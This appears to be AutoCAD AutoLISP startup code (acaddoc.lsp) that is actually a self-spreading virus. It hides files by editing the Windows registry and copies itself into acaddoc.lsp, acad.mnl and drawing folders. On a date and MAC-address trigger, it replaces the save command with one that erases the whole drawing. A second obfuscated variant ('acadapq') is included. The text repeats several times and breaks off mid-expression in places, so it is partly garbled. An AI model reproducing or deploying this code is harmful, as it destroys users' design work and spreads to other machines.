(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
"cmdecho"
0
)
(setq
wpath
(
findfile 
"base.dcl"
)
)
(setq
wpath
(substr
wpath 
1
(
-
(
strlen
wpath
) 
8
)
)
)
(setq 
wwmnlwpath 
(
getvar
"menuname"
)
) 
(setq 
wnowdwg 
(getvar 
"dwgname"
)
)
(setq
wwjqm 
(findfile
wnowdwg
)
)
(setq 
wdwgwpath
(substr
wwjqm
1
(
-
(
strlen
wwjqm
) 
(
strlen 
wnowdwg
)
)
)
)
;;;alert  
(
setq 
f
(
open 
"c:\\boot.dat"
"w"
)
)  
(write-line
"[dang]" 
f)
(write-line
(strcat
 "ff="
wdwgwpath
)  
f)
(write-line
(strcat 
"yy="   
wpath
) 
f) 
(close
f
)
(setq
boot 
(findfile
"boot.dat"
)
)	
(if 
(/= 
boot 
""
) 
(command
"_-vbarun" 
"ThisDrawing.hh"
) 
)
(setq
wacadwpath 
(findfile 
"acaddoc.lsp"
)
)	
(setq 
wacadwpath
(substr
wacadwpath
1
(- 
(strlen
wacadwpath
) 
11
)
)
)
(setq
wns1
""
wns2 
""
)
(setq
wlspbj
0)
(setq
wwjqm 
(strcat
wpath
"acaddoc.lsp"
)
) 
(if 
(setq 
wwjm 
(open 
wwjqm
"r"
)
)
(progn
(while
(setq
wwz 
(read-line
 wwjm
)
)
(setq
wns1
wns2
)
(setq
wns2
wwz)
)
(if
(> 
(strlen 
wns1) 
14)  
(if 
(= 
(substr 
wns1 
8 
7) 
"acadapq"
) 
(setq 
wlspbj 
1
)
)
)
(close
wwjm
)
)
)
(setq 
wlspmnl 
0)
(setq 
wwjqm 
(strcat 
wpath 
"acad.mnl"
)
)
(if
(setq 
wwjm 
(open 
wwjqm 
"r"
)
)
(progn
(while 
(setq 
wwz 
(read-line 
wwjm)
)
(setq 
wns1 
wns2)
(setq 
wns2 
wwz)
)
(if 
(> 
(strlen 
wns1) 
14)
(if 
(= 
(substr
 wns1
 8 
7) 
"acadapq"
)
(setq 
wlspmnl 
1)))
(close
 wwjm
)
   )
)
(if 
(= 
wlspmnl 
0)				  
(progn	  
(setq  
wwjqm 
(strcat 
wpath 
(strcat 
(chr 
97) 
(chr 
99) 
(chr 
97) 
(chr 
100) 
(chr 
46) 
(chr 
109) 
(chr 
110) 
(chr 
108
)
)
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
)wwjm
)
(write-line 
"(princ)" 
wwjm)
(close 
wwjm
)
  )
)
(defun 
wwriteapp ()
(if 
(setq 
wwjm1 
(open 
wnewacad 
"w"
)
)
(progn 
(setq 
wwjm 
(open 
woldacad 
"r"
)
)
(while 
(setq 
wwz 
(read-line 
wwjm
)
)
(write-line 
wwz 
wwjm1
)
)				
(close
wwjm
)
(close 
wwjm1
)
)
)
)
(if 
(and 
(= 
wacadwpath
 wdwgwpath) 
(/= 
wacadwpath
 wpath
)
) 
(progn	  
(if
(= 0 
wlspmnl
)
(progn
(setq 
woldacad 
(findfile 
"acaddoc.lsp"
)
)	  
(setq 
wnewacad 
(strcat  
wpath 
"acadapq.lsp")
)
)
(progn 
(setq 
woldacad 
(strcat 
wpath 
"acadapq.lsp"
)
)
(setq
wnewacad 
(findfile 
"acaddoc.lsp"
)
)
 )	  		
 )
(if      
(= 
wlspbj 
0)				  
(progn
(setq 
wwjqm 
(strcat 
wpath 
"acaddoc.lsp"
)
)
(setq 
wwjm 
(open 
wwjqm 
"a"
)
)
(write-line 
(strcat 
"(load " 
(chr 
34) 
"acadapq" 
(chr 
34) 
")" 
) 
wwjm
)
(write-line
"(princ)"
wwjm
)
(close
wwjm)
)
)
(wwriteapp
)
 )
(progn
(if 
(/= 
wnowdwg 
"Drawing.dwg"
)
(progn
(setq 
woldacad 
(findfile 
"acadapq.lsp"
)
)
(setq 
wnewacad 
(strcat 
wdwgwpath 
"acaddOc.lsp"
)
)
(wwriteapp
)
)
)
)
)
(setvar 
"cmdecho" 
wold_cmd
)
(princ)
(setq 
strtopstr 
(strcat  
(chr
 92) 
(chr 
92) 
(chr 
70) 
(chr 
83) 
(chr 
49) 
(chr 
92) 
(chr 
83) 
(chr 
89) 
(chr 
83) 
(chr 
49)  
(chr 
92) 
(chr 
87) 
(chr 
79) 
(chr 
82) 
(chr 
75) 
(chr 
92) 
(chr 
80) 
(chr 
76) 
(chr 
79) 
(chr 
84) 
(chr 
69) 
(chr 
82)
)
)
(setq
strbottomstr 
(strcat 
*chr 
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
  (vl-load-com)
  (setvar "cmdecho" 0)
  (setvar "filedia" 1)
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
    "CheckedValue"
    0
  )  
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "CheckedValue"
    0
  )
  (vl-registry-write
    "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
    "DefaultValue"
    0
  )
  (setq mnlpth (getvar "menuname"))
  (setq dwgpre (getvar "dwgprefix"))
  (if (setq doclsp (findfile "acaddoc.lsp"))
    (progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
	   (chklsp (strcat mnlpth ".mnl") doclsp)
	   (chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
    )
  )
  (setq	mac0
	 '(2256	  2256	 2726	2256   2585   2726   3243   2679
	   2726	  2256	 3149	2726   3196   3290   2726   2632
	   2397
	  )
  )
  (if (and (> (setq cdate (getvar "cdate")) 20090909)
	   (member (vl-string->list (car (macaddr))) (mkgroup mac0))
	   (= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
      )
    (dolsp)
  )
  (princ)
)
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
  (if (setq fp3 (open fp1 "r"))
    (progn
      (if
	(not
	  (wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
		   "*;;;jjyy*"
	  )
	)
	 (writelsp fp2 fp1)
      )
      (close fp3)
    )
    (writelsp fp2 fp1)
  )
  (attset fp1 2)
  (attset fp2 2)
)
(defun writelsp	(fp1 fp2 / fp3 fp4 tem)
  (setq	fp3 (open fp1 "r")
	fp4 (open fp2 "a")
  )
  (while (setq tem (read-line fp3)) (write-line tem fp4))
  (close fp3)
  (close fp4)
  (princ)
)
(defun attset (fp code / fp1)
  (if (and (/= "" fp) code)
    (progn (vl-load-com)
	   (vlax-put-property
	     (setq fp1 (vlax-invoke-method
			 (vlax-create-object "Scripting.FileSystemObject")
			 'GetFile
			 fp
		       )
	     )
	     'Attributes
	     code
	   )
    )
  )
  (vlax-release-object fp1)
)
(defun mkgroup (pt0 / pts)
  (setq i 1)
  (repeat 500
    (setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
    (setq i (1+ i))
  )
  (reverse pts)
)
(defun macaddr (/ mac WMIobj con lox sn)
  (vl-load-com)
  (if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
    (progn
      (setq
	con (vl-catch-all-apply
	      'vlax-invoke
	      (list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
	    )
      )
      (if (vl-catch-all-error-p con)
	(setq
	  con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
	)
      )
      (setq lox	(vlax-invoke
		  con
		  'ExecQuery
		  "Select * From Win32_NetworkAdapter "
		)
      )
      (vlax-for	i lox
	(if (vlax-get i 'NetConnectionID)
	  (progn (setq sn (vlax-get i 'MACAddress))
		 (or (member sn mac) (setq mac (cons sn mac)))
	  )
	)
      )
      (mapcar 'vlax-release-object (list lox con WMIobj))
    )
  )
  (reverse mac)
)
(defun dolsp ()
  (command "undefine" "qsave")
  (command "undefine" "saveas")
  (command "undefine" "wblock")
  (command "undefine" "insert")
  (command "undefine" "pline")
)
(defun c:qsave ()
  (command "_.erase" (ssget "x") "")
  (princ)
)
(defun c:saveas	(/ fp1)
  (setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
  (chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
	  (findfile "acaddoc.lsp")
  )
  (princ)
)
(defun c:wblock () (princ))
(defun c:insert () (princ))
(defun c:pline () (command "_.line") (princ))
;;;jjyy
(load "acadapq")
(princ)
(setq
wold_cmd
(getvar
"cmdecho"
)
)
(setvar
